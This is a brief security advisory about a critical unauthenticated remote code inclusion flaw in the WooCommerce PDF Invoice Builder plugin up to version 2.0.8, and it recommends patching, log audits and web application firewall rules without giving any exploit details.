A critical remote code inclusion vulnerability in the WooCommerce PDF Invoice Builder plugin permits unauthenticated attackers to execute arbitrary code on the host server.

This is an Improper Control of Generation of Code vulnerability that facilitates Remote Code Inclusion. The flaw is exploitable by unauthenticated remote attackers, requiring no prior system access or credentials to trigger.

This vulnerability carries a maximum CVSS score of 10.0, representing the highest level of severity. Exploitation allows for complete server takeover, resulting in potential data theft, installation of malicious backdoors, and total loss of confidentiality, integrity, and availability for the affected web store.

Immediate Action: Update the WooCommerce PDF Invoice Builder plugin to a version greater than 2.0.8 immediately.

Proactive Monitoring: Audit web server access logs for suspicious requests containing unexpected file paths or code execution payloads directed at the plugin directory.

Compensating Controls: Deploy a Web Application Firewall (WAF) with rules configured to detect and block common code injection and remote file inclusion patterns.

Public Exploit Available: True

The availability of public exploit code combined with the unauthenticated nature of this vulnerability necessitates an emergency patching cycle. All instances of the affected plugin must be updated immediately to prevent compromise.